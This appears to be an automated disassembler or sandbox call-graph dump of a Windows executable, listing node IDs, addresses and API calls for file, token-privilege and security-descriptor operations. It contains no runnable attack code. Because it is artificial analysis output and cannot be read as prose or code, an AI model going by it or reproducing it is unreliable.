419135 14590->14591 14591->14578 14593 40f6ba GetVersion 14592->14593 14594 40f6ce 14592->14594 14593->14594 14594->14202 14596 412334 14595->14596 14597 41232f 14595->14597 14599 412402 EnterCriticalSection 14596->14599 14602 41235b lstrlenA 14596->14602 14605 412338 14596->14605 14629 412550 14597->14629 14600 412436 LeaveCriticalSection GetVolumeInformationA 14599->14600 14601 41241e lstrcmpiA 14599->14601 14603 4124b8 EnterCriticalSection 14600->14603 14604 41246f 14600->14604 14601->14600 14607 4124fc LeaveCriticalSection 14601->14607 14606 41236c 14602->14606 14614 412379 14602->14614 14603->14607 14608 4124c7 lstrcpynA 14603->14608 14604->14603 14610 412484 GetDriveTypeA 14604->14610 14605->14208 14606->14208 14607->14208 14608->14607 14610->14603 14611 41249e 14610->14611 14638 4125f0 CreateFileA 14611->14638 14613 4124b5 14613->14603 14614->14599 14616 412703 14615->14616 14617 4126fe 14615->14617 14619 412721 IsValidSecurityDescriptor 14616->14619 14622 412707 14616->14622 14618 412550 18 API calls 14617->14618 14618->14616 14620 412730 14619->14620 14621 412738 GetSecurityDescriptorControl 14619->14621 14620->14215 14623 412751 14621->14623 14626 412759 14621->14626 14622->14215 14623->14215 14624 4127ce 14624->14215 14625 4127e4 CreateFileA 14627 412804 14625->14627 14628 41280e SetKernelObjectSecurity CloseHandle 14625->14628 14626->14624 14626->14625 14627->14215 14628->14215 14630 4125e1 14629->14630 14631 412560 CreateMutexA 14629->14631 14630->14596 14632 412572 14631->14632 14633 412576 InterlockedExchange 14631->14633 14632->14596 14634 4125b2 InitializeCriticalSection 14633->14634 14635 41258a InterlockedExchange CloseHandle WaitForSingleObject ReleaseMutex 14633->14635 14649 412830 GetCurrentProcess OpenProcessToken 14634->14649 14635->14596 14637 4125d0 ReleaseMutex 14637->14630 14639 4126b0 CreateFileA 14638->14639 14640 412629 GetKernelObjectSecurity GetLastError 14638->14640 14643 4126c7 CloseHandle 14639->14643 14644 4126d6 14639->14644 14641 412650 GetProcessHeap HeapAlloc 14640->14641 14642 4126a4 CloseHandle 14640->14642 14641->14642 14645 41266a GetKernelObjectSecurity 14641->14645 14642->14613 14643->14644 14644->14613 14646 412694 GetProcessHeap HeapFree 14645->14646 14647 41267e SetKernelObjectSecurity 14645->14647 14646->14642 14647->14646 14648 41268c 14647->14648 14648->14646 14650 412911 14649->14650 14651 41284f LookupPrivilegeValueA 14649->14651 14650->14637 14652 4128c0 14651->14652 14653 412886 AdjustTokenPrivileges 14651->14653 14654 412903 CloseHandle 14652->14654 14655 4128c9 LookupPrivilegeValueA 14652->14655 14653->14652 14656 41289e GetLastError 14653->14656 14654->14650 14655->14654 14658 4128db AdjustTokenPrivileges 14655->14658 14656->14652 14657 4128a4 CloseHandle 14656->14657 14657->14637 14658->14654 14659 4128f3 GetLastError 14658->14659 14659->14654 14660 4128f9 14659->14660 14660->14654 14662 4137c9 14661->14662 14663 41375f 14661->14663 14662->14220 14663->14662 14664 4137ad MultiByteToWideChar 14663->14664 14665 41377d 14663->14665 14664->14220 14666 4137a3 14665->14666 14667 41378d MultiByteToWideChar 14665->14667 14666->14220 14667->14666 15179 40a941 15242 4022e0 15179->15242 15182 40a96a 15192 40a9c8 15182->15192 15246 411170 15182->15246 15183 40a94f 15184 419c6e 3 API calls 15183->15184 15185 40a95b 15184->15185 15186 40aa13 15189 40aa4d 15186->15189 15371 40b0b0 15186->15371 15193 40b0b0 30 API calls 15189->15193 15196 40aa8c 15189->15196 15209 40aaf5 15189->15209 15190 40a995 15190->15192 15195 40a9a2 15190->15195 15191 40aa3f 15191->15196 15392 40c480 15191->15392 15192->15186 15192->15189 15194 406640 3 API calls 15192->15194 15197 40aa77 15193->15197 15198 40aa03 15194->15198 15200 419c6e 3 API calls 15195->15200 15199 419c6e 3 API calls 15196->15199 15197->15196 15427 40b490 15197->15427 15202 412920 26 API calls 15198->15202 15203 40aa97 15199->15203 15204 40a9ae 15200->15204 15202->15186 15206 40aab9 15203->15206 15208 412920 26 API calls 15203->15208 15207 40aa85 15207->15196 15207->15209 15208->15206 15210 40abc2 15209->15210 15211 40ab0b 15209->15211 15213 40abd3 15210->15213 15214 40ab6b 15210->15214 15212 419c6e 3 API calls 15211->15212 15215 40ab17 15212->15215 15216 40aca5 15213->15216 15217 40abde 15213->15217 15218 412920 26 API calls 15214->15218 15220 412920 26 API calls 15216->15220 15219 412920 26 API calls 15217->15219 15223 40aba1 15218->15223 15221 40abff 15219->15221 15222 40acc6 15220->15222 15225 419c6e 3 API calls 15221->15225 15224 40ae08 15223->15224 15227 40ad8c 15223->15227 15444 406ae0 15224->15444 15228 40ac26 15225->15228 15232 412920 26 API calls 15227->15232 15230 40ac9c 15228->15230 15231 40ac40 15228->15231 15229 40ae14 15233 419c6e 3 API calls 15229->15233 15434 410130 15231->15434 15235 40adcb 15232->15235 15236 40ae27 15233->15236 15239 419c6e 3 API calls 15235->15239 15237 40ac51 15237->15230 15238 40ac7b 15237->15238 15240 412920 26 API calls 15237->15240 15238->15230 15241 40adee 15239->15241 15240->15238 15243 4022ee 15242->15243 15244 4022e9 15242->15244 15243->15182 15243->15183 15455 402300 15244->15455 15247 4114a9 15246->15247 15248 41118a 15246->15248 15249 411512 15247->15249 15250 4114ae 15247->15250 15458 411100 15248->15458 15253 411640 15249->15253 15287 41151b 15249->15287 15251 413326 ___free_lc_time 7 API calls 15250->15251 15256 4114e2 15251->15256 15254 411892 15253->15254 15255 411649 15253->15255 15260 411ad0 15254->15260 15267 41189c 15254->15267 15258 413274 12 API calls 15255->15258 15259 413326 ___free_lc_time 7 API calls 15256->15259 15257 4115ce 15263 411100 36 API calls 15257->15263 15275 4115e5 15257->15275 15261 41165e 15258->15261 15262 4114ee 15259->15262 15269 413326 ___free_lc_time 7 API calls 15260->15269 15273 4118a7 15260->15273 15265 41166a 15261->15265 15268 413274 12 API calls 15261->15268 15262->15190 15263->15275 15264 4111cd 15266 411df0 89 API calls 15264->15266 15265->15190 15271 41123a 15266->15271 15267->15273 15274 413274 12 API calls 15267->15274 15272 41168f 15268->15272 15269->15273 15270 406640 CharToOemA MultiByteToWideChar MultiByteToWideChar 15270->15287 15277 411245 15271->15277 15278 4113b4 15271->15278 15280 41169b 15272->15280 15297 4116b9 15272->15297 15273->15190 15279 4118f8 15274->15279 15275->15190 15276 412920 26 API calls 15276->15287 15281 411278 15277->15281 15282 41124e 15277->15282 15284 411440 15278->15284 15285 4113c9 15278->15285 15288 411901 15279->15288 15301 41338f 6 API calls 15279->15301 15326 41194f 15279->15326 15283 413326 ___free_lc_time 7 API calls 15280->15283 15292 4112dd 15281->15292 15293 41127c 15281->15293 15289 413326 ___free_lc_time 7 API calls 15282->15289 15290 4116a6 15283->15290 15300 406640 3 API calls 15284->15300 15314 411368 15284->15314 15291 406640 3 API calls 15285->15291 15286 4117ab 15286->15190 15287->15257 15287->15270 15287->15276 15288->15190 15294 41125a 15289->15294 15290->15190 15295 4113da 15291->15295 15461 41c5bf CreateDirectoryA 15292->15461 15296 406640 3 API calls 15293->15296 15302 413326 ___free_lc_time 7 API calls 15294->15302 15303 406640 3 API calls 15295->15303 15304 41128f 15296->15304 15297->15286 15298 4116fe GetFullPathNameA 15297->15298 15305 4116ef 15297->15305 15306 41171f 15298->15306 15328 4116f9 15298->15328 15307 41145a 15300->15307 15301->15326 15308 411265 15302->15308 15309 4113ee 15303->15309 15310 412920 26 API calls 15304->15310 15464 413b4f 15305->15464 15312 412920 26 API calls 15306->15312 15315 412920 26 API calls 15307->15315 15308->15190 15316 412920 26 API calls 15309->15316 15317 41129f 15310->15317 15318 411730 15312->15318 15313 4112e9 15313->15314 15319 406640 3 API calls 15313->15319 15314->15190 15321 41146a 15315->15321 15323 411401 15316->15323 15331 413326 ___free_lc_time 7 API calls 15317->15331 15318->15190 15324 411302 15319->15324 15320 41179e 15320->15286 15322 413326 ___free_lc_time 7 API calls 15320->15322 15334 413326 ___free_lc_time 7 API calls 15321->15334 15325 4117b9 15322->15325 15337 413326 ___free_lc_time 7 API calls 15323->15337 15327 406640 3 API calls 15324->15327 15329 413326 ___free_lc_time 7 API calls 15325->15329 15330 4119ae 15326->15330 15336 411df0 89 API calls 15326->15336 15332 411317 15327->15332 15328->15286 15328->15320 15470 411b10 GetDriveTypeA 15328->15470 15335 4117c5 15329->15335 15339 414564 24 API calls 15330->15339 15338 4112bf 15331->15338 15340 412920 26 API calls 15332->15340 15341 41148a 15334->15341 15335->15190 15343 4119dd 15336->15343 15344 411421 15337->15344 15345 413326 ___free_lc_time 7 API calls 15338->15345 15346 411aa5 15339->15346 15347 41132a 15340->15347 15342 413326 ___free_lc_time 7 API calls 15341->15342 15348 411496 15342->15348 15343->15330 15352 411a22 15343->15352 15353 411a04 15343->15353 15349 413326 ___free_lc_time 7 API calls 15344->15349 15350 4112ca 15345->15350 15346->15273 15351 413326 ___free_lc_time 7 API calls 15346->15351 15356 413326 ___free_lc_time 7 API calls 15347->15356 15348->15190 15354 41142d 15349->15354 15350->15190 15355 411ab7 15351->15355 15358 41c5bf 2 API calls 15352->15358 15357 413326 ___free_lc_time 7 API calls 15353->15357 15354->15190 15355->15190 15359 411349 15356->15359 15360 411a09 15357->15360 15361 411a27 15358->15361 15362 413326 ___free_lc_time 7 API calls 15359->15362 15360->15190 15361->15330 15363 411a2f 15361->15363 15364 411355 15362->15364 15365 406640 3 API calls 15363->15365 15364->15190 15366 411a3c 15365->15366 15367 412920 26 API calls 15366->15367 15368 411a4c 15367->15368 15369 413326 ___free_lc_time 7 API calls 15368->15369 15370 411a66 15369->15370 15370->15190 15372 40b1a5 15371->15372 15373 40b0c8 15371->15373 15377 41908b 2 API calls 15372->15377 15390 40b1e9 15372->15390 15374 41908b 2 API calls 15373->15374 15375 40b0d5 15374->15375 15376 41b5e5 6 API calls 15375->15376 15389 40b0ee 15376->15389 15379 40b1d1 15377->15379 15378 40b14e 15380 4068d0 6 API calls 15378->15380 15382 41b5e5 6 API calls 15379->15382 15391 40b18e 15380->15391 15381 40b149 15384 40b3a7 15381->15384 15385 412920 26 API calls 15381->15385 15382->15390 15383 41908b 2 API calls 15383->15390 15386 412920 26 API calls 15384->15386 15385->15384 15388 40b3d2 15386->15388 15387 41b5e5 6 API calls 15387->15390 15388->15191 15389->15378 15389->15381 15390->15378 15390->15381 15390->15383 15390->15387 15390->15389 15391->15191 15393 40c48c 15392->15393 15394 40c4e4 15392->15394 15399 412920 26 API calls 15393->15399 15395 40c50a 15394->15395 15396 40c7af 15394->15396 15398 412920 26 API calls 15395->15398 15397 40c6e9 15396->15397 15401 407860 51 API calls 15396->15401 15397->15189 15400 40c51b 15398->15400 15399->15394 15403 412920 26 API calls 15400->15403 15402 40c7d7 15401->15402 15402->15397 15404 412920 26 API calls 15402->15404 15405 40c543 15403->15405 15406 40c7f6 15404->15406 15407 412920 26 API calls 15405->15407 15406->15189 15408 40c579 15407->15408 15409 40c5fa 15408->15409 15410 40c59a 15408->15410 15412 412920 26 API calls 15409->15412 15411 412920 26 API calls 15410->15411 15416 40c5d0 15411->15416 15413 40c63b 15412->15413 15414 412920 26 API calls 15413->15414 15414->15416 15415 412920 26 API calls 15417 40c6b7 15415->15417 15416->15415 15418 412920 26 API calls 15417->15418 15426 40c6da 15417->15426 15419 40c719 15418->15419 15421 412920 26 API calls 15419->15421 15420 412920 26 API calls 15420->15397 15422 40c741 15421->15422 15471 407860 15422->15471 15424 40c767 15425 412920 26 API calls 15424->15425 15425->15426 15426->15397 15426->15420 15428 40b503 15427->15428 15429 40b49d 15427->15429 15428->15207 15429->15428 15430 407860 51 API calls 15429->15430 15431 40b4ca 15430->15431 15431->15428 15432 412920 26 API calls 15431->15432 15433 40b4e5 15432->15433 15433->15207 15435 40fdc0 36 API calls 15434->15435 15436 410142 CreateFileA 15435->15436 15437 410165 15436->15437 15438 41016e 15436->15438 15437->15237 15439 40fce0 55 API calls 15438->15439 15440 410183 15438->15440 15439->15440 15441 41019a SetFileTime 15440->15441 15442 4101b1 15441->15442 15443 4101b4 CloseHandle 15441->15443 15442->15443 15443->15237 15445 406af7 15444->15445 15446 406b42 15445->15446 15447 406b07 15445->15447 15449 406b9f 15446->15449 15450 41908b 2 API calls 15446->15450 15448 412920 26 API calls 15447->15448 15452 406b24 15448->15452 15449->15229 15451 406b58 15450->15451 15453 41b5e5 6 API calls 15451->15453 15452->15229 15454 406b75 15453->15454 15454->15229 15456 413274 12 API calls 15455->15456 15457 40230a 15456->15457 15457->15243 15459 4101d0 36 API calls 15458->15459 15460 41110a 15459->15460 15460->15264 15462 41c5cf GetLastError 15461->15462 15463 41c5d7 15461->15463 15462->15463 15463->15313 15465 413b7c 15464->15465 15469 413b5f 15464->15469 15466 413b9a 15465->15466 15467 41338f 6 API calls 15465->15467 15468 41918f 9 API calls 15466->15468 15466->15469 15467->15466 15468->15469 15469->15328 15470->15320 15472 407873 15471->15472 15473 40787b 15471->15473 15472->15424 15474 407ce7 15473->15474 15475 407c61 15473->15475 15476 407a5d 15473->15476 15477 407c16 15473->15477 15503 40788f 15473->15503 15474->15424 15479 407c70 15475->15479 15482 413326 ___free_lc_time 7 API calls 15475->15482 15484 412920 26 API calls 15476->15484 15487 407a79 15476->15487 15478 406ae0 30 API calls 15477->15478 15481 407c54 15478->15481 15483 413274 12 API calls 15479->15483 15480 407a18 15480->15424 15481->15424 15482->15479 15486 407c79 15483->15486 15484->15487 15485 4068d0 6 API calls 15494 407ab8 15485->15494 15488 407ce0 15486->15488 15489 407c85 15486->15489 15487->15485 15491 4068d0 6 API calls 15488->15491 15492 412920 26 API calls 15489->15492 15490 4068d0 6 API calls 15490->15503 15491->15474 15493 407c9a 15492->15493 15496 406ae0 30 API calls 15493->15496 15494->15480 15495 407b09 OemToCharA 15494->15495 15507 407b1f 15494->15507 15495->15507 15497 407cd3 15496->15497 15497->15424 15498 413755 2 API calls 15498->15507 15499 407940 OemToCharA 15500 40794d CharToOemA 15499->15500 15500->15503 15501 407bb7 15501->15474 15502 406640 3 API calls 15501->15502 15504 407c06 15502->15504 15503->15480 15503->15490 15503->15499 15503->15500 15505 412920 26 API calls 15504->15505 15505->15477 15506 41338f 6 API calls 15506->15507 15507->15498 15507->15501 15507->15506 15508 413b4f 15 API calls 15507->15508 15508->15507 15693 413847 15694 413853 GetCurrentProcess TerminateProcess 15693->15694 15697 413864 15693->15697 15694->15697 15695 4138de 15696 4138ce ExitProcess 15697->15695 15697->15696 15967 405848 15968 405853 15967->15968 15972 4058bd 15967->15972 15971 406640 3 API calls 15968->15971 15968->15972 15969 405938 15970 405973 15969->15970 15986 40f740 15969->15986 15977 406640 3 API calls 15970->15977 15975 4058a5 15971->15975 15972->15969 15973 4059dc 15972->15973 15974 40590f 15972->15974 15981 406640 3 API calls 15973->15981 15980 412920 26 API calls 15974->15980 15978 412920 26 API calls 15975->15978 15979 40599d 15977->15979 15978->15972 15982 412920 26 API calls 15979->15982 15980->15969 15983 4059ff 15981->15983 15985 4059ad 15982->15985 15984 412920 26 API calls 15983->15984 15984->15969 15987 4144da 16 API calls 15986->15987 15988 40f751 15987->15988 15989 40f974 15988->15989 15990 40fb60 71 API calls 15988->15990 15989->15970 15991 40f775 CreateFileA 15990->15991 15992 40f7ac SetFileAttributesA 15991->15992 15994 40f7ea 15991->15994 15993 40f7bf GetLastError 15992->15993 15992->15994 15996 412920 26 API calls 15993->15996 15995 40f8b7 15994->15995 15997 40fac0 GetVersion 15994->15997 15998 40f8d3 GetLastError 15995->15998 15999 40f905 15995->15999 16002 40f7d3 15996->16002 16003 40f814 15997->16003 16004 412920 26 API calls 15998->16004 16000 40f909 SetFileTime 15999->16000 16001 40f96d CloseHandle 15999->16001 16000->16001 16006 40f943 GetLastError 16000->16006 16001->15989 16002->15994 16003->15995 16008 40f980 70 API calls 16003->16008 16005 40f8e7 16004->16005 16005->15970 16007 412920 26 API calls 16006->16007 16009 40f956 16007->16009 16010 40f83d 16008->16010 16009->16001 16010->15995 16011 40f873 16010->16011 16012 406640 3 API calls 16010->16012 16014 412920 26 API calls 16011->16014 16013 40f863 16012->16013 16015 412920 26 API calls 16013->16015 16014->15995 16015->16011 14668 406760 14690 411df0 14668->14690 14670 40676f 14671 4067be 14670->14671 14673 406791 14670->14673 14674 40677f 14670->14674 14712 41391a 14671->14712 14730 41c068 14673->14730 14724 41c073 GetFileAttributesA 14674->14724 14679 4067d9 14684 406640 3 API calls 14679->14684 14680 40681a 14715 40f6d0 14680->14715 14681 40678e 14681->14673 14683 4067a2 14686 406640 3 API calls 14683->14686 14687 4067b6 14684->14687 14685 406827 14686->14687 14688 412920 26 API calls 14687->14688 14689 4067fd 14688->14689 14733 41c29c 14690->14733 14693 411e10 14697 40fdc0 36 API calls 14693->14697 14694 411f48 GetFileAttributesA 14695 411f94 14694->14695 14696 411f56 14694->14696 14695->14670 14696->14695 14701 407730 55 API calls 14696->14701 14698 411e17 CreateFileA 14697->14698 14699 411e40 GetFileTime CloseHandle 14698->14699 14700 411f3e 14698->14700 14699->14700 14702 411e67 14699->14702 14700->14670 14703 411f70 14701->14703 14704 411e74 14702->14704 14770 412020 FileTimeToLocalFileTime 14702->14770 14703->14670 14704->14670 14706 411ee3 14707 412020 57 API calls 14706->14707 14708 411ef6 14706->14708 14707->14708 14709 411f1e 14708->14709 14710 412020 57 API calls 14708->14710 14709->14670 14711 411f3b 14710->14711 14711->14700 14845 4138fa 14712->14845 14714 4067cd 14714->14679 14714->14680 14716 40f6b0 GetVersion 14715->14716 14717 40f6d7 14716->14717 14718 40f6db 14717->14718 14719 40f6ee SetFilePointer 14717->14719 14718->14685 14720 40f70a 14719->14720 14721 40f70f SetEndOfFile 14719->14721 14720->14685 14722 40f720 SetFilePointer 14721->14722 14723 40f71a 14721->14723 14722->14685 14723->14685 14725 41c09e GetLastError 14724->14725 14726 41c082 SetFileAttributesA 14724->14726 14727 41c0aa 14725->14727 14726->14725 14729 41c0af 14726->14729 14727->14681 14729->14681 14914 41c03e DeleteFileA 14730->14914 14732 40679b 14732->14671 14732->14683 14734 41c2b6 14733->14734 14735 41c2f3 14734->14735 14736 41c2c4 14734->14736 14749 411e05 14734->14749 14783 41ca52 GetCurrentDirectoryA 14735->14783 14736->14749 14779 41ca95 14736->14779 14738 41c2f8 FindFirstFileA 14740 41c317 14738->14740 14741 41c3be FileTimeToLocalFileTime 14738->14741 14740->14749 14787 41c9af 14740->14787 14743 41c532 GetLastError 14741->14743 14744 41c3d7 FileTimeToSystemTime 14741->14744 14812 419c07 14743->14812 14744->14743 14745 41c3ed 14744->14745 14747 419a07 52 API calls 14745->14747 14751 41c411 14747->14751 14749->14693 14749->14694 14752 41c42a FileTimeToLocalFileTime 14751->14752 14753 41c47d 14751->14753 14752->14743 14754 41c443 FileTimeToSystemTime 14752->14754 14756 41c498 FileTimeToLocalFileTime 14753->14756 14757 41c493 FindClose 14753->14757 14754->14743 14755 41c459 14754->14755 14760 419a07 52 API calls 14755->14760 14756->14743 14758 41c4b1 FileTimeToSystemTime 14756->14758 14765 41c4f6 14757->14765 14758->14743 14762 41c4c3 14758->14762 14759 41c33e 14759->14749 14763 41c35e GetDriveTypeA 14759->14763 14760->14753 14764 419a07 52 API calls 14762->14764 14763->14749 14766 41c36a 14763->14766 14764->14757 14802 41c1e4 14765->14802 14767 419a07 52 API calls 14766->14767 14769 41c398 14767->14769 14769->14765 14771 412046 FileTimeToSystemTime 14770->14771 14772 412038 14770->14772 14774 412064 14771->14774 14775 41210d 14771->14775 14773 413f9e 55 API calls 14772->14773 14776 41203e 14773->14776 14774->14775 14777 413c4c 52 API calls 14774->14777 14775->14706 14776->14706 14778 4120f5 14777->14778 14778->14706 14780 41caa5 14779->14780 14782 41c2ed 14779->14782 14781 41918f 9 API calls 14780->14781 14780->14782 14781->14782 14782->14738 14784 41ca74 14783->14784 14786 41ca8a 14783->14786 14784->14786 14814 41bd99 14784->14814 14786->14738 14788 41ca41 14787->14788 14789 41c9bf 14787->14789 14820 41ccf4 14788->14820 14789->14788 14790 41c9c4 14789->14790 14792 41c9ef GetFullPathNameA 14790->14792 14794 413274 12 API calls 14790->14794 14795 41ca03 14792->14795 14796 41ca1c 14792->14796 14793 41c9dc 14793->14759 14797 41c9d5 14794->14797 14795->14793 14799 413326 ___free_lc_time 7 API calls 14795->14799 14796->14793 14798 41ca2c GetLastError 14796->14798 14800 413326 ___free_lc_time 7 API calls 14796->14800 14797->14792 14797->14793 14798->14793 14799->14793 14801 41ca2b 14800->14801 14801->14798 14803 41c1fb 14802->14803 14804 41c27c 14803->14804 14835 41c841 14803->14835 14804->14749 14807 41c841 15 API calls 14808 41c25a 14807->14808 14808->14804 14809 41c841 15 API calls 14808->14809 14810 41c26b 14809->14810 14810->14804 14811 41c841 15 API calls 14810->14811 14811->14804 14813 419c18 FindClose 14812->14813 14813->14749 14816 41bdc4 14814->14816 14819 41bda7 14814->14819 14815 41bde0 14818 41918f 9 API calls 14815->14818 14815->14819 14816->14815 14817 41338f 6 API calls 14816->14817 14817->14815 14818->14819 14819->14786 14823 41cd07 14820->14823 14822 41cd03 14822->14793 14824 41cd18 14823->14824 14825 41cd6a GetCurrentDirectoryA 14823->14825 14832 41cdd8 14824->14832 14829 41cd7c 14825->14829 14828 41cd3c GetFullPathNameA 14828->14829 14830 41cd23 14829->14830 14831 413274 12 API calls 14829->14831 14830->14822 14831->14830 14833 41cde2 GetDriveTypeA 14832->14833 14834 41cd1e 14832->14834 14833->14834 14834->14828 14834->14830 14836 41c853 14835->14836 14840 41c865 14835->14840 14841 41a950 14836->14841 14838 41c249 14838->14804 14838->14807 14839 41918f 9 API calls 14839->14840 14840->14838 14840->14839 14842 41a9a3 14841->14842 14843 41a968 14841->14843 14842->14843 14844 413b4f 15 API calls 14842->14844 14843->14838 14844->14842 14851 418fbc 14845->14851 14848 413903 14848->14714 14852 418fd0 14851->14852 14854 4138ff 14851->14854 14853 413274 12 API calls 14852->14853 14852->14854 14853->14854 14854->14848 14855 418e4c 14854->14855 14856 418e6b 14855->14856 14858 413916 14856->14858 14859 41b7f2 14856->14859 14858->14714 14860 41b80f 14859->14860 14869 41b84e 14860->14869 14880 414317 14860->14880 14863 41b98b CreateFileA 14864 41b9aa GetFileType 14863->14864 14865 41b9bc GetLastError 14863->14865 14866 41b9d0 14864->14866 14867 41b9b5 CloseHandle 14864->14867 14865->14869 14884 4143ac 14866->14884 14867->14865 14869->14858 14871 41908b 2 API calls 14872 41ba29 14871->14872 14873 41ba34 14872->14873 14888 41b5e5 14872->14888 14873->14869 14876 419c6e 3 API calls 14873->14876 14875 41ba52 14877 41ba68 14875->14877 14898 41be65 14875->14898 14876->14869 14877->14873 14878 41908b 2 API calls 14877->14878 14878->14873 14882 414326 14880->14882 14881 413274 12 API calls 14883 414361 14881->14883 14882->14881 14882->14883 14883->14863 14883->14869 14885 414402 14884->14885 14887 4143ba 14884->14887 14885->14869 14885->14871 14886 4143fc SetStdHandle 14886->14885 14887->14885 14887->14886 14889 41b5fd 14888->14889 14892 41b680 14888->14892 14890 41b65a ReadFile 14889->14890 14889->14892 14891 41b673 GetLastError 14890->14891 14894 41b6ad 14890->14894 14891->14892 14892->14875 14893 41b726 ReadFile 14895 41b744 GetLastError 14893->14895 14896 41b74e 14893->14896 14894->14892 14894->14893 14895->14896 14896->14894 14897 41908b 2 API calls 14896->14897 14897->14896 14899 41be72 14898->14899 14900 41908b 2 API calls 14899->14900 14907 41bf92 14899->14907 14901 41beaa 14900->14901 14902 41908b 2 API calls 14901->14902 14901->14907 14903 41bec2 14902->14903 14904 41bf47 14903->14904 14903->14907 14912 41bed8 14903->14912 14906 41908b 2 API calls 14904->14906 14913 41bf24 14904->14913 14905 41908b 2 API calls 14905->14907 14908 41bf54 14906->14908 14907->14877 14909 41bf5a SetEndOfFile 14908->14909 14910 41bf72 GetLastError 14909->14910 14909->14913 14910->14913 14911 415612 6 API calls 14911->14912 14912->14911 14912->14913 14913->14905 14915 41c04c GetLastError 14914->14915 14916 41c054 14914->14916 14915->14916 14916->14732 15702 414878 GetVersion 15713 417635 HeapCreate 15702->15713 15704 4148d6 15725 418ac8 15704->15725 15706 4148ec GetCommandLineA 15739 41a052 15706->15739 15710 414906 15771 419d4c 15710->15771 15712 41490b 15714 417655 15713->15714 15715 41768b 15713->15715 15784 4174ed 15714->15784 15715->15704 15718 417671 15721 41768e 15718->15721 15723 4181d9 5 API calls 15718->15723 15719 417664 15796 417692 HeapAlloc 15719->15796 15721->15704 15722 41766e 15722->15721 15724 41767f HeapDestroy 15722->15724 15723->15722 15724->15715 15726 413274 12 API calls 15725->15726 15727 418ad9 15726->15727 15728 418ae7 GetStartupInfoA 15727->15728 15729 414957 7 API calls 15727->15729 15735 418bf8 15728->15735 15738 418b33 15728->15738 15729->15728 15731 418c1f GetStdHandle 15734 418c2d GetFileType 15731->15734 15731->15735 15732 418c5f SetHandleCount 15732->15706 15733 413274 12 API calls 15733->15738 15734->15735 15735->15731 15735->15732 15736 418ba4 15736->15735 15737 418bc6 GetFileType 15736->15737 15737->15736 15738->15733 15738->15735 15738->15736 15740 41a0a0 15739->15740 15741 41a06d GetEnvironmentStringsW 15739->15741 15743 41a075 15740->15743 15744 41a091 15740->15744 15742 41a081 GetEnvironmentStrings 15741->15742 15741->15743 15742->15744 15747 4148fc 15742->15747 15745 41a0b9 WideCharToMultiByte 15743->15745 15746 41a0ad GetEnvironmentStringsW 15743->15746 15744->15747 15748 41a133 GetEnvironmentStrings 15744->15748 15749 41a13f 15744->15749 15751 41a0ed 15745->15751 15752 41a11f FreeEnvironmentStringsW 15745->15752 15746->15745 15746->15747 15762 419e05 15747->15762 15748->15747 15748->15749 15753 413274 12 API calls 15749->15753 15754 413274 12 API calls 15751->15754 15752->15747 15760 41a15a 15753->15760 15755 41a0f3 15754->15755 15755->15752 15756 41a0fc WideCharToMultiByte 15755->15756 15757 41a116 15756->15757 15758 41a10d 15756->15758 15757->15752 15761 413326 ___free_lc_time 7 API calls 15758->15761 15759 41a170 FreeEnvironmentStringsA 15759->15747 15760->15759 15761->15757 15763 419e17 15762->15763 15764 419e1c GetModuleFileNameA 15762->15764 15812 4155f6 15763->15812 15766 419e3f 15764->15766 15767 413274 12 API calls 15766->15767 15768 419e60 15767->15768 15769 414957 7 API calls 15768->15769 15770 419e70 15768->15770 15769->15770 15770->15710 15772 419d59 15771->15772 15774 419d5e 15771->15774 15773 4155f6 19 API calls 15772->15773 15773->15774 15775 413274 12 API calls 15774->15775 15776 419d8b 15775->15776 15777 419d9f 15776->15777 15778 414957 7 API calls 15776->15778 15781 413274 12 API calls 15777->15781 15782 419de2 15777->15782 15783 414957 7 API calls 15777->15783 15778->15777 15779 413326 ___free_lc_time 7 API calls 15780 419dee 15779->15780 15780->15712 15781->15777 15782->15779 15783->15777 15798 41b280 15784->15798 15787 417530 GetEnvironmentVariableA 15789 41760d 15787->15789 15790 41754f 15787->15790 15788 417516 15788->15787 15792 417528 15788->15792 15789->15792 15803 4174c0 GetModuleHandleA 15789->15803 15793 417594 GetModuleFileNameA 15790->15793 15794 41758c 15790->15794 15792->15718 15792->15719 15793->15794 15794->15789 15800 41afdb 15794->15800 15797 4176ae 15796->15797 15797->15722 15799 4174fa GetVersionExA 15798->15799 15799->15787 15799->15788 15805 41aff2 15800->15805 15804 4174d7 15803->15804 15804->15792 15807 41b00a 15805->15807 15806 41338f 6 API calls 15806->15807 15807->15806 15808 41b03a 15807->15808 15809 41afee 15808->15809 15810 41338f 6 API calls 15808->15810 15811 41bd99 15 API calls 15808->15811 15809->15789 15810->15808 15811->15808 15813 415606 15812->15813 15814 4155ff 15812->15814 15813->15764 15816 415232 15814->15816 15823 4153cb 15816->15823 15820 415275 GetCPInfo 15821 415289 15820->15821 15822 4153bf 15821->15822 15828 415471 GetCPInfo 15821->15828 15822->15813 15824 4153eb 15823->15824 15825 4153db GetOEMCP 15823->15825 15826 415243 15824->15826 15827 4153f0 GetACP 15824->15827 15825->15824 15826->15820 15826->15821 15826->15822 15827->15826 15829 41555c 15828->15829 15832 415494 15828->15832 15829->15822 15830 4188a6 6 API calls 15831 415510 15830->15831 15833 41918f 9 API calls 15831->15833 15832->15830 15834 415534 15833->15834 15835 41918f 9 API calls 15834->15835 15835->15829 14917 407200 14918 40722d 14917->14918 14940 411da0 GetStdHandle GetConsoleScreenBufferInfo 14918->14940 14921 4072a5 14942 41392d 14921->14942 14922 413a3a 18 API calls 14922->14921 14923 407506 14925 407468 14925->14923 14926 415612 6 API calls 14925->14926 14928 407493 14926->14928 14927 415612 6 API calls 14929 407368 14927->14929 14928->14923 14930 41392d 8 API calls 14928->14930 14929->14923 14929->14925 14929->14927 14931 41392d 8 API calls 14929->14931 14936 4074a9 14930->14936 14931->14929 14932 4072c2 14932->14929 14933 407339 14932->14933 14934 413a3a 18 API calls 14932->14934 14935 41392d 8 API calls 14933->14935 14934->14933 14935->14929 14936->14923 14937 415612 6 API calls 14936->14937 14938 4074ec 14937->14938 14938->14923 14939 41392d 8 API calls 14938->14939 14939->14923 14941 407275 14940->14941 14941->14921 14941->14922 14941->14929 14943 413936 14942->14943 14944 41393f 14942->14944 14952 4139cd 14943->14952 14946 413968 6 API calls 14944->14946 14948 413945 14946->14948 14949 41394a 14948->14949 14956 419034 14948->14956 14949->14932 14953 41393c 14952->14953 14954 4139de 14952->14954 14953->14932 14954->14953 14955 41392d 8 API calls 14954->14955 14955->14954 14957 419040 14956->14957 14959 41395d 14956->14959 14958 41905e FlushFileBuffers 14957->14958 14957->14959 14958->14959 14960 41906a GetLastError 14958->14960 14959->14932 14960->14959 16749 40490b 16750 412920 26 API calls 16749->16750 16751 40492c 16750->16751 16752 412920 26 API calls 16751->16752 